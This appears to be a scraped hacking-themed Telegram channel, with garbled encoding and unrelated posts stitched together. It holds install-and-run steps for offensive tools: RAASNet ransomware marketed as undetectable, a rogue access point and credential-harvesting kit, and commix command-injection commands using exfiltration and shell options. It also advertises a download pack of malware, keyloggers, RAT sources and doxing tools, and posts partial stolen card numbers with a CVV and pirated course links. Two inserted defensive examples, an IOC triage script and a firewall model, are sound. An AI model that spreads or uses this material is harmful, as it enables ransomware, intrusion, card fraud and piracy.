β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Client installation under Windows
#Fast Tip
Let's look at what happens when you install the client on Windows. However well hidden the server installation process is, some initial data still has to be set, either by explicitly asking the user for it or by applying default values.
During installation of the InterBase client you need to specify the directory where InterBase will be installed; let's call it <InterBase root>. Client installation includes the following steps:
1) Copy the files included in the client.
2) Register files for sharing.
3) Create registry keys.
4) Register the TCP/IP service.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 The GuardMiner mining trojan has recently been active and spreads like a worm by actively attacking other hosts.
1️⃣ The Trojan scans for and attacks vulnerabilities in multiple server components (Redis, Drupal, Hadoop, Spring, thinkphp, WebLogic, SQLServer, Elasticsearch); both Windows and Linux systems are attacked.
2️⃣ The malicious scripts init.ps1 and init.sh are executed on the system. They download the Monero mining trojan, remove competing mining trojans and set up local persistence. On Linux, the trojan spreads across the intranet through SSH connections and Redis weak-password brute forcing.
3️⃣ init.ps1 attacks Windows systems. It downloads from the server the mining process phpupdate.exe, the configuration file config.json, the scan-and-attack process networkmanager.exe, the persistence script newdat.ps1, the mining daemon phpguard.exe and the cleanup script clean.bat.
4️⃣ init.sh attacks Linux systems. It downloads from the server the mining process phpupdate, the configuration file config.json, the persistence script newdat.sh, the scan-and-attack process networkmanager and the mining daemon phpuguard.
5️⃣ The three sets of mining pools and wallets used for mining are as follows:
xmr.f2pool.com : 13531
43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfwozyfS520
xmr-eu2.nanopool.org:
14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520
randomxmonero.hk.nicehash.com:3380
3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520
....
@UndercodeNews
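A triage sketch for the indicators listed in the post above, added here as an example and not taken from the original report. It matches the file names and pool hosts the post names; the sample paths under /tmp/x and the sample DNS names are constructed, since the post does not say where the files are dropped.

```python
import ntpath
import posixpath

# File and process names as the post lists them ("phpuguard" is the post's spelling).
WINDOWS_NAMES = {"init.ps1", "phpupdate.exe", "networkmanager.exe",
                 "newdat.ps1", "phpguard.exe", "clean.bat"}
LINUX_NAMES = {"init.sh", "phpupdate", "networkmanager", "newdat.sh", "phpuguard"}
# Pool host names from item 5 of the post.
POOL_HOSTS = ("xmr.f2pool.com", "xmr-eu2.nanopool.org",
              "randomxmonero.hk.nicehash.com")
# config.json is far too common to alert on by itself; it only counts when it
# sits in the same directory as one of the names above.
SUPPORTING_NAME = "config.json"


def _pathmod(os_family):
    """Pick the path-parsing rules of the host the artefacts came from."""
    return ntpath if os_family == "windows" else posixpath


def match_file(os_family, path):
    """Return the matched indicator name for a file or executable path, else None."""
    name = _pathmod(os_family).basename(path)
    if os_family == "windows":
        name = name.lower()  # Windows file names are case-insensitive
        return name if name in WINDOWS_NAMES else None
    # Linux names are case-sensitive: the legitimate /usr/sbin/NetworkManager
    # daemon must not match the trojan's lower-case "networkmanager".
    return name if name in LINUX_NAMES else None


def match_pool(qname):
    """Return the pool host a DNS query name equals or is a subdomain of, else None."""
    q = qname.rstrip(".").lower()
    for host in POOL_HOSTS:
        if q == host or q.endswith("." + host):
            return host
    return None


def triage(os_family, paths, dns_names):
    """Return (kind, observed value, indicator) tuples for one host's artefacts."""
    pm = _pathmod(os_family)
    norm = (lambda s: s.lower()) if os_family == "windows" else (lambda s: s)
    findings, hit_dirs = [], set()
    for p in paths:
        name = match_file(os_family, p)
        if name:
            findings.append(("file", p, name))
            hit_dirs.add(norm(pm.dirname(p)))
    # Second pass: config.json only when it shares a directory with a hit.
    for p in paths:
        if norm(pm.basename(p)) == SUPPORTING_NAME and norm(pm.dirname(p)) in hit_dirs:
            findings.append(("supporting", p, SUPPORTING_NAME))
    for q in dns_names:
        host = match_pool(q)
        if host:
            findings.append(("dns", q, host))
    return findings


# Constructed sample data (not from the post): running executables / files on
# one Linux host and names seen in its DNS query log.
SAMPLE_LINUX_PATHS = [
    "/usr/sbin/NetworkManager",   # legitimate daemon, must not be flagged
    "/tmp/x/networkmanager",
    "/tmp/x/phpupdate",
    "/tmp/x/config.json",
    "/srv/app/config.json",       # unrelated application config
]
SAMPLE_DNS = [
    "xmr-eu2.nanopool.org.",
    "updates.example.org",
    "notxmr.f2pool.com.example.net",  # look-alike, not a subdomain of a pool
]

if __name__ == "__main__":
    for finding in triage("linux", SAMPLE_LINUX_PATHS, SAMPLE_DNS):
        print(finding)
```

File names alone are weak evidence; a hit is a reason to inspect the binary, its parent process and its persistence entry, not a verdict.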
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 A Hackers framework topic git:
INSTALLATION & RUN:
$ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash install
🦑 OS:
Arch Linux Working
Kali Linux Working
Ubuntu Working
Debian Working
Centos Not Tested
MacOSX Needs porting
Windows Ha no.
> RUN :
rsf > use Picklock
rsf (plugins/picklock) > help
Git TOPIC sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Information gathering:
AngryFuzz3r is a collection of pentesting tools for gathering information and discovering vulnerabilities in targets, based on FuzzDB.
🦑 FEATURES:
- Fuzz a URL set from an input file
- Concurrent relative path search
- Configurable number of fuzzing workers
- Fuzz CMS ==> WordPress, Drupal, Joomla
- Generate reports of the valid paths
INSTALLATION & RUN:
1️⃣ git clone https://github.com/ihebski/angryFuzzer.git
2️⃣ cd angryFuzzer
3️⃣ $ python angryFuzzer.py -h
Usage: angryFuzzer.py options
4️⃣ Examples:
> Fuzzing a URL with the default dictionary
angryFuzzer.py -u http://127.0.0.1
> Fuzzing a CMS (wp in this example)
angryFuzzer.py -u http://127.0.0.1 --cms wp
> Fuzzing with a custom wordlist
python angryFuzzer.py -u http://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt
git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
TOR Fronting - Utilising Hidden Services for Privacy.pdf
443.9 KB
TOR FRONTING WRITTEN TUTORIAL PDF
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 WINDOWS EXPLOITS TUTORIALS SOURCES:
+ Bypassing DEP by returning into HeapCreate - by Toto
+ First public ASLR bypass exploit by using partial overwrite - by Skape
+ Heap spray and bypassing DEP - by Skylined
+ First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability
+ Exploit codes of bypassing browsers memory protections
+ PoC's on Token Kidnapping. PoC for 2k3 - part 1 - by Cesar Cerrudo
+ PoC's on Token Kidnapping. PoC for 2k8 - part 2 - by Cesar Cerrudo
+ An exploit works from win 3.1 to win 7 - by Tavis Ormandy (KiTrap0d)
+ Old ms08-067 metasploit module multi-target and DEP bypass
+ PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass
+ SMBv2 Exploit - by Stephen Fewer
+ Microsoft IIS 7.5 remote heap buffer overflow - by redpantz
+ Browser Exploitation Case Study for Internet Explorer 11
git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Game Character Animation in Maya and Unity (1.4 GB)
https://www.pluralsight.com/courses/unity-maya-game-character-animation
https://mega.nz/#F!lE9kDKJY!UTn1ILXl0KygetHERPgGQA
🦑 MCSD 70-483 C# Complete Preparation Course + Practice Exams (3.9 GB)
https://mega.nz/#F!1INGiAzA!mwuqgGIlzibovFuZ4aGm4w
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 RANSOMWARE 2020:
FEATURES :
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extension instead of encrypting the files)
Multiple encryption methods
Select file extensions to target
Decide if payload should self-destruct (Console mode feature only)
Decide which drive to target for encryption (working directory)
Verified server access through port forwarding VPN
INSTALLATION & RUN:
1️⃣ git clone https://github.com/leonv024/RAASNet.git
2️⃣ pip3 install -r requirements.txt
3️⃣ python3 RAASNet.py
On Linux, you might need to install these packages:
apt install python3-tk python3-pil python3-pil.imagetk
Testing connection with remote server:
Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
python3 test_socket.py
> For more free tutorials for beginners about it:
https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif
ENJOY
git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 RANSOMWARE TUTORIALS FOR BEGINNERS (from git sources)
Ransomware Impact on industry
https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3
How this ransomware encryption scheme works:
https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9
How this ransomware works:
https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594
https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114
Mentions:
https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/
https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/
https://www.youtube.com/watch?v=gSfa2L158Uw
git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 What's a Ransomware?
Ransomware is a form of malware that prevents legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. It has been used for mass extortion in various forms, but the most successful form seems to be encrypting ransomware: most of the user data is encrypted and the key can be retrieved with a payment to the attacker. To be widely successful, ransomware must fulfil three properties:
Property 1: The hostile binary code must not contain any secret (e.g. deciphering keys), at least not in an easily retrievable form; indeed, white-box cryptography can be applied to ransomware.
Property 2: Only the author of the attack should be able to decrypt the infected device.
Property 3: Decrypting one device cannot provide any useful information for other infected devices; in particular, the key must not be shared among them.
🦑 Objectives (those from GitHub sources):
Encrypt all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without internet connection.
Communication with the server to decrypt the client-private-key.
Encrypt AES key with client-public-key RSA-2048.
Encrypt client-private-key with RSA-2048 server-public-key.
Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
Decryptor that communicates with the server to send keys.
Python webserver
Daemon
Dropper
Kill databases
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
BIN Amazon Prime Video
:
CVV : 067
IP : USA
Postal: 11213
:
442756103622xxxx
442756152271xxxx
442756161628xxxx
FECHA: 01/24CVV : 067
IP : USA
Postal: 11213
Simulate, understand, & visualize data like a data scientist (431 MB)
https://www.udemy.com/course/suv-data-mxc/
https://mega.nz/#F!wgpGXCxL!LzVxZdJKeNxSiV7ry3R1_w
Forwarded from Backup Legal Mega
Learning DaVinci Resolve 16 (2.65 GB)
https://www.lynda.com/DaVinci-Resolve-tutorials/Learning-DaVinci-Resolve-16/2820131-2.html
https://mega.nz/#F!AoMBySoD!F0YKh-1KI8ImYAB2mlttKA
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Automated All-in-One OS command injection and exploitation tool
Termux-Linux
WHY YOU SHOULD USE THIS TOOL?
It is used by web developers, penetration testers and security researchers to test web-based applications for bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit a command injection vulnerability in a vulnerable parameter or HTTP header.
INSTALLATION & RUN:
1️⃣ git clone https://github.com/commixproject/commix.git
2️⃣ cd commix
3️⃣ python commix.py -h
4️⃣ 1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
🦑 OS:
-Kali
-Parrot
-debian
-ubuntu
-termux
GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Free Port Scanner for Windows
- and how to see who is on your Wi-Fi in Windows?
Although the title says that Angry IP Scanner is a port scanner for Windows, it is in fact a cross-platform scanner that works great on Linux as well as on Mac. But Linux has Nmap, a powerful network scanner with many options and additional functions for obtaining information about hosts on the network. Nmap also works on Windows and even has a graphical interface, but many Windows users find it difficult to deal with the command line and Nmap's numerous options, and many just don't need such an abundance of functions (see the article Port Scanner for Windows).
So, Angry IP Scanner is a simple and intuitive program for finding hosts and scanning ports of computers, sites, servers, phones and any other online devices.
🦑 Download: https://angryip.org/download/#windows
#TIPSFORNOOBS
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
A SMALL GIFT FOR UNDERCODE MEMBERS :)
🦑 Anti Viruses
🦑 BotNets
🦑 Botting Programs (Ad Fly, ETC)
🦑 Brute forcing Programs
🦑 Cracking Programs
🦑 DDoS Programs
🦑 Deface Creators
🦑 Doxing Tools
🦑 eWhore Packs (Fetish)
🦑 Exploiting Programs (SQL Map, ParanoicScan, Dedi Exploiter, AirCrack)
🦑 Exploit Scanners (GoogleSeacher, Gr3eNox Exploit Scanner, Joomla Security Scanner, Realuike Exploit Scanner, RFI Scanner V2, RFI Tool, Special RFI, SQL Poison, XSS Scanner)
🦑 Exploits (Chat Exploits, MSN Hack, System Exploits, Team Speak)
🦑 Guides (Anonymity, BotNet, Bruteforce, Cracking, DDoSing, Defacing, Doxing, Exploits, Game Hacking, Hacking, IRL Sh*t, Linux OS, Programming, Random, Reverse Engineering, Security, SQL Injection, Viruses, WiFi Sh*t)
🦑 Hacking (Ann Loader, Password Stealers)
🦑 Injection Programs (SQL, XSS)
🦑 MD5 (MD5 Attack, MD5 Toolbox, MD5 Tools)
🦑 Sharecash
🦑 Skype Tools (Resolvers, CenSky Crasher, Florision Tools, James Reborn(V5.7), Pops Skype Tool, Skype API)
🦑 Source Codes (Crypter Sources, DDoS Programs, KEYLOGGERS, RAT Sources, RANDOM SH*T)
🦑 Tutorials (TOO MANY TO TYPE)
🦑 Viruses (Batch Virus Creators, Binders, Crypters, DNS, Keyloggers, Ratting, Spoofing, Spreading)
🦑 VPN'S & Proxies
🦑 WiFi
🦑 Youtube
https://mega.nz/folder/nO5n0DgC#1zjNjDMn8nT0qIruUI30Ow
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 UDP VS TCP BY UNDERCODE:
(VPN OPTIONS as example)
The question may arise: why is an unreliable protocol like UDP needed when there is a reliable TCP protocol?
1) The price of TCP's reliability is what accounting calls "overheads": to provide a mechanism for controlling the delivery of packets, TCP sends a lot of data that carries no useful information and serves only to establish and control the connection.
> For example, to send even one packet of useful data over TCP, you first need to complete a three-stage handshake: the source sends 1 special packet to the destination, receives 1 packet saying that a connection can be established, and sends 1 more special packet with confirmation.
2) For this reason both TCP and UDP are "good"; what matters is using them correctly. For example, when streaming video it doesn't matter which packet was lost a second or two ago. But when opening a web page, where incomplete data may cause problems in processing the HTTP request, you do need to monitor the delivery and integrity of each data packet.
🦑 A detailed understanding of TCP and UDP matters when:
1️⃣ analysing network traffic
2️⃣ configuring the iptables network firewall
3️⃣ understanding and protecting against some kinds of DoS attacks.
For example, once you understand the mechanism of TCP connections, you can configure iptables so that all new connections are prohibited while existing ones are preserved, or prohibit any incoming connections while fully permitting outgoing ones, understand and prevent a number of DoS attacks, and understand SYN and other types of scans: why they are possible and what their mechanism is, etc.
Written by undercode
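The policy described above (refuse new incoming connections, keep existing ones, permit everything outgoing) modelled as a small connection tracker. This is an added example, not code from the original post; the addresses, ports and packet sequence are constructed, and the model ignores FIN teardown and timeouts.

```python
from collections import namedtuple

# direction is "in" or "out" relative to the protected host (192.0.2.10 here).
Packet = namedtuple("Packet", "direction src sport dst dport flags")


def pkt(direction, src, dst, flags):
    """Build a Packet from 'ip:port' strings and a 'SYN|ACK'-style flag string."""
    s_ip, s_port = src.rsplit(":", 1)
    d_ip, d_port = dst.rsplit(":", 1)
    return Packet(direction, s_ip, int(s_port), d_ip, int(d_port),
                  frozenset(flags.split("|")))


class StatefulFilter:
    """Allow all outbound traffic; allow inbound traffic only for known flows."""

    def __init__(self, established=()):
        # Flow key -> state. `established` seeds the connections that already
        # existed when the policy was loaded, so they are preserved.
        self.flows = {key: "ESTABLISHED" for key in established}

    @staticmethod
    def key(p):
        """(local ip, local port, remote ip, remote port), whatever the direction."""
        if p.direction == "out":
            return (p.src, p.sport, p.dst, p.dport)
        return (p.dst, p.dport, p.src, p.sport)

    def decide(self, p):
        k = self.key(p)
        state = self.flows.get(k)
        if p.direction == "out":
            if p.flags == {"SYN"}:
                self.flows[k] = "SYN_SENT"        # handshake step 1
            elif state == "SYN_ACK_SEEN" and "ACK" in p.flags:
                self.flows[k] = "ESTABLISHED"     # handshake step 3
            if "RST" in p.flags:
                self.flows.pop(k, None)
            return "ACCEPT out"
        if state is None:
            # A bare SYN is an attempt to open a new connection. Anything else
            # with no flow behind it (ACK probes, stray data) belongs to nothing.
            return "DROP new" if p.flags == {"SYN"} else "DROP invalid"
        if "RST" in p.flags:
            del self.flows[k]
            return "ACCEPT reset"
        if state == "SYN_SENT":
            if p.flags == {"SYN", "ACK"}:
                self.flows[k] = "SYN_ACK_SEEN"    # handshake step 2
                return "ACCEPT handshake"
            return "DROP invalid"
        return "ACCEPT known"


def replay(packets, established=()):
    """Run packets through a fresh filter; return (verdicts, final flow table)."""
    f = StatefulFilter(established)
    return [f.decide(p) for p in packets], f.flows


# Constructed scenario: one SSH session exists before the policy is applied.
EXISTING = [("192.0.2.10", 22, "198.51.100.7", 50000)]
SAMPLE = [
    pkt("in", "198.51.100.7:50000", "192.0.2.10:22", "PSH|ACK"),   # existing session
    pkt("in", "203.0.113.9:40000", "192.0.2.10:22", "SYN"),        # new connection / SYN scan probe
    pkt("in", "203.0.113.9:40001", "192.0.2.10:80", "ACK"),        # ACK probe, no flow
    pkt("out", "192.0.2.10:51000", "198.51.100.20:443", "SYN"),    # host opens a connection
    pkt("in", "198.51.100.20:443", "192.0.2.10:51000", "SYN|ACK"),
    pkt("out", "192.0.2.10:51000", "198.51.100.20:443", "ACK"),
    pkt("in", "198.51.100.20:443", "192.0.2.10:51000", "PSH|ACK"),
]

if __name__ == "__main__":
    verdicts, _ = replay(SAMPLE, EXISTING)
    for p, v in zip(SAMPLE, verdicts):
        print(p.direction, sorted(p.flags), "->", v)
```

Because the inbound SYN is dropped before any SYN-ACK is sent, a SYN scan gets no answer from the port, while the seeded SSH flow and the outbound HTTPS flow keep working.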
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 WIFI HACKING - LINUX 2020:
FEATURES :
Rogue access point attack
Man-in-the-middle attack
Module for deauthentication attack
Module for extra-captiveflask templates
Rogue Dns Server
Captive portal attack (captiveflask)
Intercept, inspect, modify and replay web traffic
WiFi networks scanning
DNS monitoring service
Credentials harvesting
Transparent Proxies
LLMNR, NBT-NS and MDNS poisoner
INSTALLATION & RUN:
1️⃣ sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7
FOR MORE OS INSTALL GO TO https://wifipumpkin3.github.io/docs/getting-started#installation
2️⃣ $ git clone https://github.com/P0cL4bs/wifipumpkin3.git
3️⃣ $ cd wifipumpkin3
4️⃣ $ sudo make install
🦑 FOR KALI:
1️⃣ $ sudo apt install libssl-dev libffi-dev build-essential
2️⃣ $ git clone https://github.com/P0cL4bs/wifipumpkin3.git
3️⃣ $ cd wifipumpkin3
Now we need to install PyQt5, which is very easy:
4️⃣ sudo apt install python3-pyqt5
Or check whether PyQt5 was installed successfully:
5️⃣ python3 -c "from PyQt5.QtCore import QSettings; print('done')"
If you got the message done, the next step is to install wp3:
6️⃣ $ sudo python3 setup.py install
🦑 Tools (pre-installed):
> iptables (current: iptables v1.6.1)
> iw (current: iw version 4.14)
> net-tools (current: version 1.60+)
> wireless-tools (current: version 30~pre9-12)
> hostapd (current: hostapd v2.6)
7️⃣ Once the tool is started with sudo wifipumpkin3, you'll be presented with an interactive session like the Metasploit Framework, where you can enable or disable modules, plugins and proxies, configure the AP, etc.
> MORE USAGE: CHECK HERE
Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking